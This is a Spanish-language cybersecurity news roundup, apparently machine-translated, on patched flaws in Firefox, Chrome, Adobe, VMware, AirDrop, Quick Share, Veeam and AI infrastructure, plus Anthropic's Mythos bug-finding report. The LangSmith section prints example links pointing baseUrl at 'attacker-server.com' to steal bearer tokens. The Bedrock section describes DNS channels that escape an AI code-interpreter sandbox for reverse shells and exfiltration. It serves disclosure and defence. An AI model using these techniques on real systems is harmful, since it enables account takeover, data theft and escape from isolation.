Las actualizaciones de Firefox, Chrome, Adobe y VMware solucionan múltiples fallos de seguridad críticos – CYBERDEFENSA.MX

Mozilla tiene liberado actualizaciones para abordar dos fallas críticas en Firefox para las cuales advirtió que se ha publicado un código de explotación.

Las vulnerabilidades se enumeran a continuación:

  • CVE-2026-15718un puntero no válido en JavaScript: componente WebAssembly
  • CVE-2026-15719un aislamiento del sitio en el DOM: componente de navegación

«Somos conscientes de que el código de explotación para esto es público, sin embargo, no tenemos conocimiento de ningún ataque en la naturaleza que aproveche esta falla», dijo Mozilla en un aviso. Ambas vulnerabilidades se solucionaron en la versión 152.0.6 de Firefox.

El lanzamiento llega como Google. enviado corrige 15 fallas de seguridad, incluidos dos errores críticos de uso después de la liberación en Ozono (CVE-2026-15764 y CVE-2026-15765), una capa de abstracción multiplataforma que permite al navegador interactuar de forma nativa con varios servidores de visualización y sistemas de ventanas. Es compatible con Linux, ChromeOS y Fuchsia.

Ciberseguridad

«El uso gratuito en Ozone en Google Chrome en Linux anterior a 150.0.7871.125 permitió a un atacante remoto que convenció a un usuario a realizar gestos específicos en la interfaz de usuario para explotar potencialmente la corrupción del montón a través de una página HTML diseñada», según una descripción de CVE-2026-15764 en la Base de datos nacional de vulnerabilidad (NVD) del NIST.

Las deficiencias se han solucionado en la versión 150.0.7871.124/.125 de Chrome para Windows y Mac y en la 150.0.7871.124 para Linux.

En un desarrollo relacionado, Adobe ha publicado actualizaciones de seguridad para 88 vulnerabilidades, incluidos múltiples errores de gravedad crítica en ColdFusion, Commerce, Experience Manager e Illustrator. De estos, ocho impacto Adobe ColdFusion

  • CVE-2026-48318 (Puntuación CVSS: 9,9): una vulnerabilidad de recorrido de ruta que podría conducir a la ejecución de código arbitrario
  • CVE-2026-48322 (Puntuación CVSS: 9,6): una vulnerabilidad de inyección de código que podría provocar la ejecución de código arbitrario.
  • CVE-2026-48284 (Puntuación CVSS: 9,6): una vulnerabilidad de validación de entrada incorrecta que podría provocar la ejecución de código arbitrario
  • CVE-2026-48321 (Puntuación CVSS: 9,3): una vulnerabilidad de autorización incorrecta que podría provocar una escalada de privilegios
  • CVE-2026-48325 (Puntuación CVSS: 9,3): falta de autenticación para una vulnerabilidad de función crítica que podría provocar la ejecución de código arbitrario
  • CVE-2026-48319 (Puntuación CVSS: 9,1): una vulnerabilidad de recorrido de ruta que podría conducir a la ejecución de código arbitrario
  • CVE-2026-48324 (Puntuación CVSS: 9,1): una vulnerabilidad de inyección SQL que podría provocar la ejecución de código arbitrario
  • CVE-2026-48327 (Puntuación CVSS: 9,0): una vulnerabilidad de autorización incorrecta que podría provocar la ejecución de código arbitrario
Ciberseguridad

Las fallas de CodeFusion se han solucionado en las versiones ColdFusion 2025 Update 11 y ColdFusion 2023 Update 22. Adobe también corrigió dos fallas críticas cada una en Código abierto de Adobe Commerce y Magento y Administrador de experiencia de Adobe

  • CVE-2026-48356 (Puntuación CVSS: 9,6): una vulnerabilidad de carga de archivos en Adobe Commerce y Magento Open Source que podría provocar una escalada de privilegios.
  • CVE-2026-48358 (Puntuación CVSS: 9.1) – Una codificación inadecuada o una vulnerabilidad de escape de salida en Adobe Commerce y Magento Open Source que podría conducir a la ejecución de código arbitrario.
  • CVE-2026-48259 (Puntuación CVSS: 9,6): una vulnerabilidad de falsificación de solicitudes del lado del servidor en Adobe Experience Manager que podría provocar la ejecución de código arbitrario.
  • CVE-2026-48359 (Puntuación CVSS: 9,6): una restricción inadecuada de la vulnerabilidad de referencia de entidad externa XML en Adobe Experience Manager que podría provocar la ejecución de código arbitrario.

En otros lugares, Broadcom ha liberado una solución para una vulnerabilidad crítica de omisión de autenticación en VMware Avi Load Balancer (CVE-2026-47865puntuación CVSS: 9,8) que un usuario malintencionado con acceso a la red puede aprovechar para acceder al plano Avi Control. A Filip Waeytens, del Centro de Seguridad Cibernética de la OTAN (NCSC), se le atribuye el mérito de descubrir e informar la falla.

Aunque ninguna de las vulnerabilidades ha sido marcada como explotada activamente, es esencial que las organizaciones instalen las últimas actualizaciones, dado que se sabe que los actores de amenazas utilizan las fallas de estos productos como armas en los ataques.

Los fallos de AirDrop y Quick Share permiten que los atacantes cercanos provoquen bloqueos y eludan controles – CYBERDEFENSA.MX

Dos investigadores han encontrado seis fallos de seguridad en Entrega por paracaídas y Compartir rápidolas funciones inalámbricas que transmiten archivos entre dispositivos cercanos sin cables ni red compartida.

Un atacante dentro del alcance inalámbrico, con solo una computadora portátil y sin conexión previa, puede bloquear el servicio compartido en una Mac o iPhone configurado para recibir de cualquier persona, sin toque ni aviso.

La misma investigación encontró fallas en Quick Share que eluden las comprobaciones de sesión de Samsung y provocan un bloqueo potencialmente explotable en la aplicación de Windows de Google.

Las dos funciones se ejecutan dentro de un ecosistema de más de cinco mil millones de dispositivos Apple y Android activos, aunque los errores probados afectan a implementaciones y versiones específicas.

La obra, planteada en un nuevo trabajo de investigación por Arash Ale Ebrahim y Nils Ole Tippenhauer del Centro CISPA Helmholtz para la Seguridad de la Información, es el primero en separar ambas pilas una al lado de la otra, por encima de la capa de radio, donde el descubrimiento se convierte en manejo de sesiones, análisis y decisiones de confianza.

Los arreglos ya comenzaron. Apple corrigió uno de los tres errores de AirDrop y le asignó un CVE, aunque el aviso aún no es público; los otros dos aún se encuentran en divulgación coordinada. Google pagó una recompensa por la falla de Windows y consiguió una corrección de código, con su CVE aún pendiente.

Ciberseguridad

Los dos errores de Samsung fueron entregados a Google y siguen bajo investigación. Al momento de escribir este artículo, no ha surgido ningún informe público sobre la explotación de estas fallas.

Tres formas de acabar con el intercambio de Apple

Las tres fallas de AirDrop terminan en el mismo fallo: eliminan el servicio compartido, el servicio en segundo plano en macOS e iOS que maneja AirDrop. El problema es que este servicio también ejecuta AirPlay, Handoff, Universal Clipboard, Continuity Camera y NameDrop, por lo que una falla destruye todo el conjunto.

El más simple de los tres solo necesita una única solicitud con formato incorrecto enviada a un dispositivo con AirDrop configurado para recibir de «Todos». Envíe esos mensajes de fallo en bucle, aproximadamente uno cada dos segundos, y las funciones permanecerán inactivas mientras el atacante continúe. En la prueba de los investigadores, no se realizó ninguna transferencia AirDrop legítima mientras se ejecutaba el ataque.

Dos de los tres son más que errores de AirDrop, porque viven en marcos compartidos de Apple. El más amplio es un desbordamiento de pila en el analizador de listas de propiedades XML de Foundation, provocado por un pequeño archivo con alrededor de 200 capas anidadas.

Cualquier aplicación de Apple que abra un archivo de ese tipo que no sea de confianza podría acceder a la misma ruta del analizador en macOS, iOS, watchOS, tvOS y visionOS. Los investigadores reprodujeron los fallos de AirDrop en macOS 15.7.4, macOS 26.3, iOS 18.x e iOS 26.3; una versión anterior de iOS 16 no se vio afectada.

Los errores de Quick Share y una solución que falló

En Android, dos fallas en Quick Share de Samsung permitieron a un atacante saltarse el apretón de manos que se supone bloquea una sesión. Se permite que un dispositivo no verificado comience a controlar la conexión antes de que se configure cualquier cifrado.

El otro permite que algunos mensajes de control pasen sin cifrar incluso después de que exista una sesión segura. Un atacante en la misma red Wi-Fi podría usar esa brecha para forzar una conexión a un estado «aceptada», mantenerla viva o hacer que el servidor devuelva valores de IP y puerto proporcionados por el atacante. Ninguno de ellos roba archivos, pero ambos anulan las protecciones que promete el sistema.

Los investigadores los probaron en un Galaxy S23 Ultra y notaron que las versiones de Quick Share de otros fabricantes de Android necesitan una verificación por separado.

La falla más grave está en Quick Share de Google para Windows. Es un error de memoria que surge cuando dos conexiones chocan en el instante correcto, dejando al programa usando una porción de memoria que ya ha desperdiciado.

Ese es el tipo de error que a veces puede convertirse en la ejecución de código atacante, y los investigadores dicen que la ruta es plausible aquí porque una defensa de Windows llamada Control Flow Guard está desactivada en la aplicación.

Confirmaron un fallo pero no crearon un exploit que funcionara. Google lo reconoció, pagó una recompensa y ahora consiguió una solución; el CVE aún está pendiente.

No es la primera vez que Quick Share para Windows está aquí. SafeBreach informó un Cadena de ejecución de código de 10 errores en 2024 (CVE-2024-38271 y CVE-2024-38272), luego regresó en 2025 para evitar las correcciones de Google (CVE-2024-10668). El nuevo uso después de la liberación agrega otra entrada a un patrón del mismo componente que se parchea y prueba nuevamente.

Ciberseguridad

El detalle que duele: el propio código fuente del programa contenía un comentario que admitía un error anterior en ese lugar exacto, que decía «Tuvimos un error aquí, causado por una carrera con EncryptionRunner». La solución escrita para solucionarlo reintrodujo el mismo tipo de falla.

El riesgo es local, no remoto

El límite clave es el alcance. Se trata de ataques locales, no de Internet: el atacante debe estar a una distancia de entre 10 y 30 metros o en la misma red local.

Si bien es menos radical que un error remoto, un solo atacante en un lugar concurrido como un aeropuerto, un tren o una conferencia aún puede llegar a muchos dispositivos a la vez. Los investigadores probaron sólo su propio hardware y han lanzaron sus herramientas abiertamente para que otros equipos de seguridad puedan reproducir los hallazgos.

En una Mac o iPhone, instale la última actualización de Apple (iOS y macOS 26.5.2 se enviaron el 29 de junio) y mantenga AirDrop en «Solo contactos» o desactivado en lugar de «Todos», que es la configuración que necesitan estas fallas. En Quick Share, déjelo fuera de la visibilidad de «Todos» cuando no esté recibiendo activamente un archivo y actualice la aplicación de Windows ahora que la solución de Google ha llegado.

Dos sistemas construidos de forma independiente fallaron de la misma manera: fallas en el código que se dirige a la red y controles de seguridad integrados en manejadores de mensajes individuales en lugar de aplicarse desde el principio. También llega en un momento incómodo.

La interoperabilidad AirDrop de Google para Quick Share ya se está implementando en los principales teléfonos Android, y solo funciona cuando el iPhone está configurado para recibir de «Todos», la configuración exacta que expone los errores de falla de AirDrop.

Anthropic: Mythos encuentra más de 10.000 fallos de software en el primer mes

Anthropic dijo que su iniciativa Proyecto Glasswing, de un mes de duración, ha descubierto más de 10.000 vulnerabilidades de software de gravedad alta o crítica en códigos de importancia sistémica, un hallazgo que, según la compañía, ha desplazado el problema central en ciberseguridad de descubrir fallas a verificarlas y parcharlas.

Los hallazgos, extraídos de informes de socios y evaluaciones independientes, marcan una de las primeras explicaciones a gran escala de lo que puede hacer un modelo de IA de frontera cuando se apunta a un código ampliamente utilizado, y de los cuellos de botella que surgen una vez que lo hace.

Varios socios informaron que sus tasas de descubrimiento de errores se habían multiplicado por más de diez. Cloudflare identificó 2.000 errores en sus sistemas de ruta crítica, incluidos 400 clasificados como altos o críticos, con una tasa de falsos positivos que la compañía dijo que consideraba mejor que la de los evaluadores humanos. En un banco asociado anónimo, al modelo se le atribuyó el mérito de haber ayudado a detectar y prevenir una transferencia bancaria fraudulenta de 1,5 millones de dólares iniciada después de que la cuenta de correo electrónico de un cliente se viera comprometida y seguida de llamadas telefónicas falsas.

Las evaluaciones externas citadas en la actualización siguieron los resultados publicados por Anthropic. El Instituto de Seguridad de IA del Reino Unido descubrió que Mythos Preview era el primer modelo en resolver sus dos rangos cibernéticos (simulaciones de ciberataques de varios pasos) de extremo a extremo. Mozilla dijo encontró y solucionó 271 vulnerabilidades en Firefox 150 mientras probaba el modelo, más de 10 veces el número encontrado en Firefox 148 usando un modelo Anthropic anterior. Impulsado por IA plataforma de seguridad XBOW calificó el modelo como un paso significativo con respecto a los sistemas existentes en su punto de referencia de explotación web.

Anthropic también utilizó Mythos para escanear más de 1000 proyectos de código abierto. El modelo ha señalado 23.019 vulnerabilidades potenciales, 6.202 de ellas estimadas como altas o críticas. De 1.752 hallazgos con calificación alta o crítica revisados ​​por seis firmas independientes de investigación de seguridad o por la propia Anthropic, más del 90% fueron confirmados como válidos y más del 62% fueron confirmados como altos o críticos.

La compañía señaló que, si bien es buena para encontrar vulnerabilidades, todavía existe una brecha para que la gente solucione todos los problemas.

«El cuello de botella para corregir errores como estos es la capacidad humana para clasificarlos, informarlos, diseñar e implementar parches para ellos», afirma el informe.

Los mantenedores de código abierto también han estado lidiando con una ola de informes de errores de baja calidad generados por IA, y Anthropic dijo que intenta reproducir y evaluar cada problema antes de informarlo. A petición de sus mantenedores, en ocasiones ha revelado errores sin mayor investigación, reportando 1.129 casos de este tipo, de los cuales el modelo estimó que 175 eran altos o críticos.

Anthropic dijo que no ha lanzado públicamente modelos de clase Mythos porque ninguna empresa, incluida ella misma, ha desarrollado salvaguardas para evitar un uso indebido grave. Mientras tanto, lanzó Claude Security en versión beta pública para clientes empresariales, que según dijo se ha utilizado para parchear más de 2.100 vulnerabilidades en tres semanas utilizando el Claude Opus 4.7 disponible públicamente, y ha comenzado un programa de verificación cibernética para profesionales de la seguridad.

La compañía dijo que planea expandir el Proyecto Glasswing con socios adicionales, incluidos los gobiernos de Estados Unidos y aliados, antes de cualquier lanzamiento más amplio del modelo subyacente.

«Glasswing ayuda a los defensores cibernéticos más importantes sistémicamente a obtener una ventaja asimétrica. Sin embargo, existe una necesidad urgente de que el mayor número posible de organizaciones refuercen sus defensas cibernéticas», afirma el informe. «Esperamos que nuestros modelos generalmente disponibles y las nuevas herramientas, recursos e investigaciones que proporcionamos para acompañarlos ayuden a esas organizaciones a mejorar su postura de ciberseguridad».

Greg Otto

Escrito por Greg Otto

Greg Otto es el editor en jefe de CyberScoop y supervisa todo el contenido editorial del sitio web. Greg ha dirigido una cobertura de ciberseguridad que ha ganado varios premios, incluidos los de la Sociedad de Periodistas Profesionales y la Sociedad Estadounidense de Editores de Publicaciones Empresariales. Antes de unirse a Scoop News Group, Greg trabajó para Washington Business Journal, US News & World Report y WTOP Radio. Tiene una licenciatura en periodismo televisivo de la Universidad de Temple.

Los fallos de la IA en Amazon Bedrock, LangSmith y SGLang permiten la filtración de datos y el RCE – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de un nuevo método para extraer datos confidenciales de entornos de ejecución de código de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS).

En un informe publicado el lunes, BeyondTrust reveló que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes que un atacante puede aprovechar para habilitar shells interactivos y evitar el aislamiento de la red. La emisión, que no tiene un identificador CVE, tiene una puntuación CVSS de 7,5 sobre 10,0.

Intérprete de código de Amazon Bedrock AgentCore es un servicio totalmente administrado que permite a los agentes de IA ejecutar código de forma segura en entornos aislados tipo sandboxde modo que las cargas de trabajo agentes no puedan acceder a sistemas externos. Fue lanzado por Amazon en agosto de 2025.

El hecho de que el servicio permita consultas de DNS a pesar de la configuración de «sin acceso a la red» puede permitir que «los actores de amenazas establezcan canales de comando y control y exfiltración de datos a través de DNS en ciertos escenarios, evitando los controles de aislamiento de red esperados», dijo Kinnaird McQuade, arquitecto jefe de seguridad de BeyondTrust.

En un escenario de ataque experimental, un actor de amenazas puede abusar de este comportamiento para configurar un canal de comunicación bidireccional mediante consultas y respuestas de DNS, obtener un shell inverso interactivo, filtrar información confidencial a través de consultas de DNS si su función de IAM tiene permisos para acceder a recursos de AWS, como depósitos S3 que almacenan esos datos, y ejecutar comandos.

Ciberseguridad

Es más, se puede abusar del mecanismo de comunicación DNS para entregar cargas útiles adicionales que se envían al intérprete de código, lo que hace que sondee el servidor de comando y control (C2) de DNS en busca de comandos almacenados en registros DNS A, los ejecute y devuelva los resultados a través de consultas de subdominio DNS.

Vale la pena señalar que Code Interpreter requiere una función de IAM para acceder a los recursos de AWS. Sin embargo, un simple descuido puede provocar que se asigne una función con privilegios excesivos al servicio, otorgándole amplios permisos para acceder a datos confidenciales.

«Esta investigación demuestra cómo la resolución DNS puede socavar las garantías de aislamiento de la red de los intérpretes de código aislados», dijo BeyondTrust. «Al utilizar este método, los atacantes podrían haber extraído datos confidenciales de los recursos de AWS accesibles a través de la función IAM del intérprete de código, lo que podría causar tiempo de inactividad, violaciones de datos de información confidencial del cliente o infraestructura eliminada».

Tras la divulgación responsable en septiembre de 2025, Amazon determinó que se trataba de una funcionalidad prevista y no de un defecto, e instó a los clientes a utilizar modo VPC en lugar del modo sandbox para un aislamiento completo de la red. El gigante tecnológico también recomienda el uso de un cortafuegos DNS para filtrar el tráfico DNS saliente.

«Para proteger las cargas de trabajo sensibles, los administradores deben inventariar todas las instancias activas de AgentCore Code Interpreter y migrar inmediatamente aquellas que manejan datos críticos del modo Sandbox al modo VPC», dijo Jason Soroko, miembro senior de Sectigo.

«Operar dentro de una VPC proporciona la infraestructura necesaria para un aislamiento sólido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS Route53 Resolver para monitorear y bloquear la resolución DNS no autorizada. Finalmente, los equipos de seguridad deben auditar rigurosamente las funciones de IAM adjuntas a estos intérpretes, aplicando estrictamente el principio de privilegio mínimo para restringir el radio de explosión de cualquier posible compromiso».

LangSmith es susceptible a un error de adquisición de cuentas

La divulgación se produce cuando Miggo Security reveló una falla de seguridad de alta gravedad en LangSmith (CVE-2026-25750puntuación CVSS: 8,5) que exponía a los usuarios a un posible robo de tokens y apropiación de cuentas. El problema, que afecta tanto a las implementaciones autohospedadas como a las implementaciones en la nube, se solucionó en la versión 0.12.71 de LangSmith, lanzada en diciembre de 2025.

La deficiencia se ha caracterizado como un caso de inyección de parámetros de URL derivada de una falta de validación en el parámetro baseUrl, lo que permite a un atacante robar el token de portador, la ID de usuario y la ID del espacio de trabajo de un usuario que ha iniciado sesión y transmitidos a un servidor bajo su control mediante técnicas de ingeniería social, como engañar a la víctima para que haga clic en un enlace especialmente diseñado como el siguiente:

  • Nube – smith.langchain[.]es/studio/?baseUrl=https://attacker-server.com
  • Autohospedado – /studio/?baseUrl=https://attacker-server.com

La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener acceso no autorizado al historial de seguimiento de la IA, así como exponer consultas SQL internas, registros de clientes de CRM o código fuente propietario mediante la revisión de llamadas a herramientas.

«Un usuario de LangSmith que haya iniciado sesión podría verse comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace malicioso», afirman los investigadores de Miggo, Liad Eliyahu y Eliana Vuijsje. dicho.

«Esta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de IA son ahora una infraestructura crítica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo pasan por alto sin darse cuenta las barreras de seguridad. Este riesgo se agrava porque, al igual que el software ‘tradicional’, los agentes de IA tienen acceso profundo a fuentes de datos internas y servicios de terceros».

Defectos de deserialización de pepinillos inseguros en SGLang

También se han señalado vulnerabilidades de seguridad en SGLang, un popular marco de código abierto para servir modelos de lenguaje grandes y modelos de IA multimodal, que, si se explotan con éxito, podrían desencadenar una deserialización insegura de pickle, lo que podría resultar en la ejecución remota de código.

Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, siguen sin parchearse al momento de escribir este artículo. Una breve descripción de las fallas es la siguiente:

  • CVE-2026-3059 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del broker ZeroMQ (también conocido como ZMQ), que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al módulo de generación multimodal de SGLang.
  • CVE-2026-3060 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del módulo de desagregación, que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al sistema de desagregación paralela del codificador SGLang.
  • CVE-2026-3989 (Puntuación CVSS: 7,8): el uso de una función pickle.load() insegura sin validación y deserialización adecuada en «replay_request_dump.py» de SGLang, que puede explotarse proporcionando un archivo pickle malicioso.

«Los dos primeros permiten la ejecución remota de código no autenticado contra cualquier implementación de SGLang que exponga sus características de generación o desagregación multimodal a la red», Stepansky dicho. «El tercero implica una deserialización insegura en una utilidad de reproducción de volcado de memoria».

Ciberseguridad

En un aviso coordinado, el Centro de Coordinación CERT (CERT/CC) dijo que SGLang es vulnerable a CVE-2026-3059 cuando el sistema de generación multimodal está habilitado, y a CVE-2026-3060 cuando el sistema de desagregación paralela del codificador está habilitado.

«Si se cumple cualquiera de las condiciones y un atacante conoce el puerto TCP en el que el corredor ZMQ está escuchando y puede enviar solicitudes al servidor, puede explotar la vulnerabilidad enviando un archivo pickle malicioso al corredor, que luego lo deserializará», CERT/CC dicho.

Se recomienda a los usuarios de SGLang restringir el acceso a las interfaces del servicio y asegurarse de que no estén expuestos a redes que no sean de confianza. También se recomienda implementar controles de acceso y segmentación de red adecuados para evitar la interacción no autorizada con los puntos finales de ZeroMQ.

Si bien no hay evidencia de que estas vulnerabilidades hayan sido explotadas en la naturaleza, es crucial monitorear conexiones TCP entrantes inesperadas al puerto del corredor ZeroMQ, procesos secundarios inesperados generados por el proceso SGLang Python, creación de archivos en ubicaciones inusuales por el proceso SGLang y conexiones salientes del proceso SGLang a destinos inesperados.

Veeam parchea 7 fallos críticos de copia de seguridad y replicación que permiten la ejecución remota de código – CYBERDEFENSA.MX

Veeam ha lanzado actualizaciones de seguridad para abordar múltiples vulnerabilidades críticas en su software Backup & Replication que, si se explotan con éxito, podrían resultar en la ejecución remota de código.

El vulnerabilidades son los siguientes –

  • CVE-2026-21666 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
  • CVE-2026-21667 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
  • CVE-2026-21668 (Puntuación CVSS: 8,8): una vulnerabilidad que permite a un usuario de dominio autenticado evitar restricciones y manipular archivos arbitrarios en un repositorio de respaldo.
  • CVE-2026-21672 (Puntuación CVSS: 8,8): una vulnerabilidad que permite la escalada de privilegios locales en servidores Veeam Backup & Replication basados ​​en Windows.
  • CVE-2026-21708 (Puntuación CVSS: 9,9): una vulnerabilidad que permite que un visor de copia de seguridad realice la ejecución remota de código como usuario de postgres.
Ciberseguridad

Las deficiencias, que afectan a Veeam Backup & Replication 12.3.2.4165 y a todas las versiones anteriores 12, se abordaron en versión 12.3.2.4465. CVE-2026-21672 y CVE-2026-21708 también se han corregido en Copia de seguridad y replicación 13.0.1.2067junto con dos fallos de seguridad más críticos

  • CVE-2026-21669 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
  • CVE-2026-21671 (Puntuación CVSS: 9.1): una vulnerabilidad que permite a un usuario autenticado con la función de administrador de respaldo realizar la ejecución remota de código en implementaciones de alta disponibilidad (HA) de Veeam Backup & Replication.

«Es importante tener en cuenta que una vez que se revela una vulnerabilidad y su parche asociado, los atacantes probablemente intentarán aplicar ingeniería inversa al parche para explotar implementaciones sin parches del software Veeam», dijo la compañía en su aviso.

Dado que las vulnerabilidades en el software Veeam han sido explotadas repetidamente por actores de amenazas para llevar a cabo ataques de ransomware en el pasado, es esencial que los usuarios actualicen sus instancias a la última versión para protegerse contra cualquier amenaza potencial.